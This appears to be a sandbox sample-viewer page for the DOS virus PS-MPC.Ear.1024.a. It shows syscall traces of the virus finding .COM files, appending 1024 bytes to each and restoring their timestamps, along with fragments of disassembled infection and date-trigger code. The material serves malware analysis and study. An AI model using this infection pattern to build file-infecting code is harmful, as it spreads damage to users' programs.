Sample viewer

vx.netlux.org/Virus.DOS.PS-MPC.Ear.1024.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:14:01.129688559Z 26 PC: 12ac8 | Set disk transfer address
2018-12-17T22:14:01.131857038Z 71 PC: 12ada | Get current directory
2018-12-17T22:14:01.134621912Z 78 PC: 12b9e | Find first file
2018-12-17T22:14:01.140466431Z 78 PC: 12b9e | Find first file
2018-12-17T22:14:01.14700892Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:14:01.153913779Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.160271Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.16234344Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:14:01.170306514Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.172953216Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.174262597Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.177774299Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.292221023Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.294057209Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.302812651Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.312851798Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.316508888Z 61 PC: 12d18 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:14:01.324137812Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.330648677Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.332537812Z 61 PC: 12d18 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:14:01.339087801Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.342088029Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.343317706Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.345849549Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.354998393Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.356399079Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.363746606Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.374076266Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.376598265Z 61 PC: 12d18 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:14:01.383438896Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.390083825Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.39231846Z 61 PC: 12d18 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:14:01.399237786Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.402955678Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.404605532Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.407534272Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.417169104Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.419048831Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.426679549Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.439120406Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.442659916Z 61 PC: 12d18 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:14:01.451165697Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.459263844Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.462323498Z 61 PC: 12d18 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:14:01.469664616Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.472768396Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.475439399Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.478004708Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.486646925Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.488729791Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.496820435Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.5066672Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.510487042Z 61 PC: 12d18 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:14:01.517262413Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.523666405Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.526103084Z 61 PC: 12d18 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:14:01.532905375Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.535878051Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.538496413Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.541202986Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.550408848Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.552401803Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.560378991Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.57031991Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.573403649Z 61 PC: 12d18 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:14:01.580853015Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.586918732Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.588884386Z 61 PC: 12d18 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:14:01.595872936Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.598508914Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.600048162Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.603479666Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.612239221Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.613887911Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.622506335Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.632275812Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.635315958Z 61 PC: 12d18 | Open file (Filename = 'PAH.COM')
2018-12-17T22:14:01.642847765Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.64914844Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.651039823Z 61 PC: 12d18 | Open file (Filename = 'PAH.COM')
2018-12-17T22:14:01.658365222Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:14:01.661078036Z 66 PC: 12c90 | Move file pointer
2018-12-17T22:14:01.662575461Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-17T22:14:01.666346102Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-17T22:14:01.675675942Z 87 PC: 12ce4 | Get or set file date and time
2018-12-17T22:14:01.6773119Z 62 PC: 12ce8 | Close file
2018-12-17T22:14:01.685498675Z 67 PC: 12cf7 | Get or set file attributes
2018-12-17T22:14:01.695186003Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.699074369Z 61 PC: 12d18 | Open file (Filename = 'TEST.COM')
2018-12-17T22:14:01.707074786Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-17T22:14:01.709715831Z 62 PC: 12bb4 | Close file
2018-12-17T22:14:01.711461533Z 79 PC: 12b9e | Find next file
2018-12-17T22:14:01.714270248Z 59 PC: 12af7 | Change current directory
2018-12-17T22:14:01.718131056Z 59 PC: 12b01 | Change current directory
2018-12-17T22:14:01.721937057Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-17T22:14:01.725299935Z 26 PC: 12b69 | Set disk transfer address
2018-12-17T22:14:01.726408211Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:12.402720569Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:12.404949374Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:12.408657411Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:12.41537797Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:12.4222991Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:12.428953257Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:12.435122959Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:12.442779434Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.453810064Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:12.461424003Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:12.465917338Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:12.4689992Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:12.484366592Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:12.486148885Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:12.494328661Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:12.50416885Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.506747962Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.513609661Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.520317115Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.522277649Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.529617779Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.533141149Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.53501145Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.539672565Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.548889216Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.550424725Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.559305093Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.56908877Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.571443273Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.579350391Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.585948834Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.588164648Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.595810989Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.598873232Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.601301966Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.604967471Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.614166121Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.616050742Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.623564544Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.630230695Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.632084012Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.636214181Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.640870651Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.642330065Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.646916824Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.650639012Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.652460045Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.655484418Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.665542154Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.667443201Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.675556453Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.685891943Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.688878271Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.695724832Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.702810743Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.705356716Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.712396371Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.715560147Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.718501015Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.721343619Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.730742472Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.733314061Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.741531867Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.751395507Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.755044774Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.761681639Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.768094226Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.770967082Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.777507953Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.780351854Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.782634001Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.785300279Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.7923001Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.793895552Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.798734637Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.806985787Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.809130988Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.813569323Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.817495699Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.819358319Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.823544551Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:12.825371377Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:12.826929005Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:12.829041536Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:12.834481483Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:12.836110702Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:12.840863791Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:12.846866872Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.849122642Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:12.856098334Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:12.85996107Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:12.861820528Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:12.863578351Z 59 PC: 12af7 | Change current directory
2018-12-25T11:46:12.869281414Z 59 PC: 12b01 | Change current directory
2018-12-25T11:46:12.872591522Z 42 PC: 12b05 | Get date 0x12b05: cmp dl, 1
0x12b08: jne 0x12b5c
0x12b0a: mov ah, 0x2c
0x12b0c: int 0x21
0x12b0e: cmp dl, 0x55
0x12b11: jg 0x12b5c
0x12b13: and dx, 7
0x12b16: shl dl, 1
0x12b18: mov bx, bp
0x12b1a: add bx, dx
0x12b1c: mov dx, word ptr [bx + 0x3b4]
0x12b20: add dx, bp
0x12b22: inc dx
0x12b23: push dx
0x12b24: mov ah, 9
0x12b26: lea dx, word ptr [bp + 0x40c]
0x12b2a: int 0x21
0x12b2c: pop dx
0x12b2d: int 0x21
0x12b2f: dec dx
2018-12-25T11:46:12.87428965Z 26 PC: 12b69 | Set disk transfer address
2018-12-25T11:46:12.875135877Z 9 PC: 12a67 | Display string (String= 'This is a tiny COM program. ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":2681,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:46:13.635804177Z 26 PC: 12ac8 | Set disk transfer address
2018-12-25T11:46:13.637253023Z 71 PC: 12ada | Get current directory
2018-12-25T11:46:13.639568993Z 78 PC: 12b9e | Find first file
2018-12-25T11:46:13.643585045Z 78 PC: 12b9e | Find first file (See above)
2018-12-25T11:46:13.650851017Z 61 PC: 12d18 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:46:13.65544328Z 63 PC: 12bb0 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:46:13.662578699Z 62 PC: 12bb4 | Close file
2018-12-25T11:46:13.66441005Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.672212239Z 64 PC: 12c87 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:46:13.67525811Z 66 PC: 12c90 | Move file pointer
2018-12-25T11:46:13.676764089Z 44 PC: 12c94 | Get time 0x12c94: mov word ptr [bp + 0x10c], cx
0x12c98: and cx, 0x1f
0x12c9b: add cx, 0x200
0x12c9f: mov word ptr [bp + 0x107], cx
0x12ca3: lea di, word ptr [bp + 0x570]
0x12ca7: mov al, 0x53
0x12ca9: stosb byte ptr es:[di], al
0x12caa: lea si, word ptr [bp + 0x103]
0x12cae: push si
0x12caf: mov cx, 0x10
0x12cb2: push cx
0x12cb3: rep movsb byte ptr es:[di], byte ptr [si]
0x12cb5: mov al, 0x5b
0x12cb7: stosb byte ptr es:[di], al
0x12cb8: lea si, word ptr [bp + 0x4f7]
0x12cbc: mov cx, 0xb
0x12cbf: rep movsb byte ptr es:[di], byte ptr [si]
0x12cc1: mov al, 0x53
0x12cc3: stosb byte ptr es:[di], al
0x12cc4: pop cx
2018-12-25T11:46:13.680552224Z 64 PC: 12ef3 | Write file or device (Write 1024 bytes on handle 5)
2018-12-25T11:46:13.697076025Z 87 PC: 12ce4 | Get or set file date and time
2018-12-25T11:46:13.699191806Z 62 PC: 12ce8 | Close file
2018-12-25T11:46:13.708349161Z 67 PC: 12cf7 | Get or set file attributes
2018-12-25T11:46:13.719434827Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.722322139Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.730396735Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.737469355Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.739505884Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.746997307Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.750277531Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.751862772Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.754731786Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.764865278Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.766724954Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.775590927Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.788261245Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.791291118Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.798476307Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.805950197Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.808493533Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.815989246Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.819958005Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.821974741Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.82520881Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.834615102Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.836311875Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.844696492Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.855831092Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.859859264Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.867274906Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.87493077Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.877837242Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.885456555Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.888676365Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.891336913Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.894739116Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.904933051Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.907653781Z 62 PC: 12ce8 | Close file (See above)
2018-12-25T11:46:13.916314983Z 67 PC: 12cf7 | Get or set file attributes (See above)
2018-12-25T11:46:13.927097502Z 79 PC: 12b9e | Find next file (See above)
2018-12-25T11:46:13.930080482Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.938145678Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:46:13.944941813Z 62 PC: 12bb4 | Close file (See above)
2018-12-25T11:46:13.947178641Z 61 PC: 12d18 | Open file (See above)
2018-12-25T11:46:13.955909081Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:46:13.959069641Z 66 PC: 12c90 | Move file pointer (See above)
2018-12-25T11:46:13.960620815Z 44 PC: 12c94 | Get time (See above)
2018-12-25T11:46:13.964621219Z 64 PC: 12ef3 | Write file or device (See above)
2018-12-25T11:46:13.974245474Z 87 PC: 12ce4 | Get or set file date and time (See above)
2018-12-25T11:46:13.975732806Z 62 PC: 12ce8 | Close file (See above)
